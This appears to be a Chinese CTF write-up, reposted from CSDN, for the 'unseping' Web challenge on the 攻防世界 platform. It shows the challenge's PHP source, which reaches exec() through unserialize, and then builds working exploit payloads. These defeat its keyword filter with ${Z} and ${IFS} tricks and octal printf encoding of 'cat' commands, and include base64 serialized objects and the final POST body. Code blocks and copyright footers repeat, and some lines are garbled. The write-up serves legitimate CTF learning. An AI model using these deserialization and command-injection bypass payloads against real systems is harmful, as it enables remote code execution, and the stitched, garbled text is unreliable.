攻防世界-unseping

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iPc18GlQ-1666931905094)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAAEKADAAQAAAABAAAAEAAAAAA0VXHyAAAB+ElEQVQoFS2SuY7CQBBE8XjMYXMfu6wQIgOJCAmRkBAh/pLfICABEUAIIQEJ4hL3bQ4b9rHeDtrTdk11dbWVer2uqqqiuHw+PRwOh0KhYDDo9Xpt297tdpvNZrVaHY/Hx+Pxfr+fz6d0uVw305RSGLpxN80D5e2maZplWefz2YFy5gCRrusSelsoX98/msZZut1u0FLK1+vFJ84ej0dRFErDMOLxuOQR8gdBWBYqXvSlp9P9/hfI4E0ikYjFYslkUqL7er2CAE6GiYwG0zSRQaaP7y9Ap9Pp/wun04mx+AaaQMPlcgHNzUgkggfEZwACW8bjcSaToW61WtFoNJ/Pd7vdWq3G0Aza6/WQQGdIyZJujiFIRN56vT4cDsVisdlscoC4Wq02Gg14P/bYtlgulzDRHUQul0MYJSy8J8MqhPjghKCEUYxGI6cjDnY6nUqlwh7m83kgEKAbL1kfI0GPhGw2K5kdAuxnhul0OhwOgfb7/VKpBBGS2u02ONRjrt/vVyaTyWAwgGy/3zMMZLDSnT7odByHjnUVCoVUKiW32y0/DFohoAl7BQ2CpYGmZCp2x32QaFHL5fJisWAmAm6ggFBMiQwQBAf8JbMcOZvNnGWBwwTWREa64zU6GRoc9x1vJHOwPmTgND7we7E7LsCHTtBw84+AhgJhvzqqhewBzcvrAAAAAElFTkSuQmCC)]GFSJ1061积分1金币1

18最佳Writeup由 shuita111 提供WriteUP

收藏

反馈

难度：1

方向：Web

题解数：1

解出人数：255

题目来源: 江苏工匠杯

题目描述:

unseping

题目场景:

http://61.147.171.105:62407

100%

倒计时: 3时42分15秒

highlight_file(__FILE__);class ease{        private $method;    private $args;    function __construct($method, $args) {        $this->method = $method;        $this->args = $args;    }     function __destruct(){        if (in_array($this->method, array("ping"))) {            call_user_func_array(array($this, $this->method), $this->args);        }    }      function ping($ip){        exec($ip, $result);        var_dump($result);    }    function waf($str){        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {            return $str;        } else {            echo "don't hack";        }    }     function __wakeup(){        foreach($this->args as $k => $v) {            $this->args[$k] = $this->waf($v);        }    }   }$ctf=@$_POST['ctf'];@unserialize(base64_decode($ctf));?>

highlight_file(__FILE__);class ease{        private $method;    private $args;    function __construct($method, $args) {        $this->method = $method;        $this->args = $args;    }     function __destruct(){        if (in_array($this->method, array("ping"))) {            call_user_func_array(array($this, $this->method), $this->args);        }    }      function ping($ip){        exec($ip, $result);        var_dump($result);    }    function waf($str){        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {            return $str;        } else {            echo "don't hack";        }    }     function __wakeup(){        foreach($this->args as $k => $v) {            $this->args[$k] = $this->waf($v);        }    }   }// $ctf=@$_POST['ctf'];// @unserialize(base64_decode($ctf));$obj=new ease("ls","ls //");$str=serialize($obj);echo $str,PHP_EOL;$str=str_replace('O:4','O:+4',$str);$str=str_replace(':2:',':3:',$str);echo $str;echo base64_encode($str);//--------------------------------echo "
";//$a=new ease("ping",array('test point'));$a= new ease("ping",array('pwd'));$b=serialize($a);echo $b;echo base64_encode($b);?>    

$a = new ease("ping",array('l${Z}s'));$b=serialize($a);echo $b;echo base64_encode($b);?>//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319

$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));$b=serialize($a);echo $b;echo base64_encode($b);//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319

flag_1s_here/flag_831b69012c67b35f.php

访问空白！

貌似是uncode编码$(printf “\154\163”) 但是好像并不是unicode编码

\154\163怎么就能代替ls了！？

印象中“\”开头的是八进制 这会不会是assic码

\154=4+58+18^2=4+40+64=108 对应assic码”l“

\163=3+68+18^2=3+48+64=115 对应assic码”s“

根据这个思路我写了一个c语言的代码

#include int main(){        char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";    for (int i = 0; i < sizeof site / sizeof site[0]; i++) {        printf("\\%o",site[i]);    }    return 0;}

————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

#/usr/bin/python3#     #     char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";s="cat flag_1s_here/flag_831b69012c67b35f.php"s1=''#用于得到字符对应的ASCII码，返回值类型为int型#01-chr()：功能：用于将数 (十进制数、二进制数、八进制数或十六进制数) 转化为其对应的字符。比如：for i in s:    print(oct(ord(i)))    s1=s1+'\\'+str(oct(ord(i)))[2:]print(s1)           #运行结果┌──(kwkl㉿kwkl)-[~/HODL]└─$ /bin/python3 /home/kwkl/HODL/adworld/web/unseping/c.py0o1430o1410o1640o400o1460o1540o1410o1470o1370o610o1630o1370o1500o1450o1620o1450o570o1460o1540o1410o1470o1370o700o630o610o1420o660o710o600o610o620o1430o660o670o1420o630o650o1460o560o1600o1500o160\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160

$(printf “\154\163”)

组合一个poc：

$(printf “\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)

$a=newease("ping",array{(}^{\prime }l${Z}s$IFSf${Z}lag_1${Z}s_here’));

$a=newease("ping",array{(}^{\prime }l${Z}s$IFSf${Z}lag_1${Z}s_here’));

$a=newease("ping",array{(}^{\prime }$(printf${IFS}“\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)'));
————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

highlight_file(__FILE__);class ease{        private $method;    private $args;    function __construct($method, $args) {        $this->method = $method;        $this->args = $args;    }     function __destruct(){        if (in_array($this->method, array("ping"))) {            call_user_func_array(array($this, $this->method), $this->args);        }    }      function ping($ip){        exec($ip, $result);        var_dump($result);    }    function waf($str){        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {            return $str;        } else {            echo "don't hack";        }    }     function __wakeup(){        foreach($this->args as $k => $v) {            $this->args[$k] = $this->waf($v);        }    }   }// $ctf=@$_POST['ctf'];// @unserialize(base64_decode($ctf));$obj=new ease("ls","ls //");$str=serialize($obj);echo $str,PHP_EOL;$str=str_replace('O:4','O:+4',$str);$str=str_replace(':2:',':3:',$str);echo $str;echo base64_encode($str);//--------------------------------echo "
";//$a=new ease("ping",array('test point'));//$a= new ease("ping",array('pwd'));//$a = new ease("ping",array('l${Z}s'));//$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));$a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));$b=serialize($a);echo $b;echo base64_encode($b);?>

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319

一定要用post方法！

ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319
————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

————————————————
版权声明：本文为CSDN博主「昵称还在想呢」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/shelter1234567/article/details/127337541

来源地址：https://blog.csdn.net/m0_47210241/article/details/127569376